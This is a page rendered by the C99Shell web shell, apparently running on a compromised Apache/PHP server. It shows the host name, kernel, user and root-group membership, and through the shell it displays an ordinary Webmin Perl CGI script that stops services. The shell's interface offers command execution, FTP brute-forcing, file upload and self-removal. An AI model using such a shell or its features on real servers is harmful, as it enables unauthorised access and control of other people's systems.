!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     stop_feature.cgi (975 B)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Stop some feature-related service

require './virtual-server-lib.pl';
&ReadParse();
&can_stop_servers() || &error($text{'stop_ecannot'});
if (&indexof($in{'feature'}, @plugins) < 0) {
    # Core feature
    $sfunc = "stop_service_".$in{'feature'};
    $err = &$sfunc($in{'id'});
    $name = $text{'feature_'.$in{'feature'}};
    }
else {
    # Plugin
    $err = &plugin_call($in{'feature'}, "feature_stop_service", $in{'id'});
    $name = &plugin_call($in{'feature'}, "feature_name");
    }
&error_setup($text{'stop_err'});
&refresh_startstop_status();
&error($err) if ($err);
&webmin_log("stop", $in{'feature'});

if ($in{'show'}) {
    # Tell the user
    &ui_print_header(undef, $text{'stop_title'}, "");

    print &text('stop_done', $name),"<p>\n";

    &run_post_actions();

    &ui_print_footer("", $text{'index_return'});
    }
elsif ($in{'redirect'}) {
    &run_post_actions_silently();
    &redirect($in{'redirect'});
    }
else {
    &run_post_actions_silently();
    &redirect($ENV{'HTTP_REFERER'});
    }



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--